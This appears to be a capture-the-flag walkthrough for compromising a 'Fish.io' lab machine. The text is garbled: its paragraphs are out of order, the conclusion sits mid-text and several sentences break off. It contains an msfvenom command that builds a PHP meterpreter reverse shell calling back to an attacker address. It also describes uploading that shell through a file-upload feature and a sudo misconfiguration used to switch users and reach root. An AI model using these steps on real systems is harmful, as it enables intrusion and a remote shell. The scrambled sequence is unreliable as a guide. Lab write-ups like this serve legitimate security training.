Hack Fish.io Direct

With administrative access, we can now explore the application's functionality. Upon reviewing the dashboard, we notice a " Upload File" feature. This feature can potentially be used to execute arbitrary code on the server.

http://10.10.10.15 The webpage appears to be a simple website with a " Contact Us" form. However, upon inspecting the page source, we notice a peculiar comment: hack fish.io

sudo -l We can leverage this configuration to gain root access: With administrative access, we can now explore the

In this walkthrough, we demonstrated how to compromise the Fish.io box on Hack The Box. By identifying open ports, enumerating HTTP services, exploiting a web application vulnerability, and leveraging a misconfigured sudo command, we were able to gain root access to the system. This exercise highlights the importance of secure configuration, input validation, and access control in preventing similar attacks. http://10

sudo -u fish /bin/bash Switching to the fish user, we find that the user's home directory contains a config file with sensitive information:

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.16 LPORT=4444 -f raw > shell.php Uploading the shell to the server via the "Upload File" feature, we can then trigger the execution of the shell by accessing the uploaded file:

To begin, we need to gather information about the target machine. Using the nmap command, we can perform an initial scan to identify open ports and services: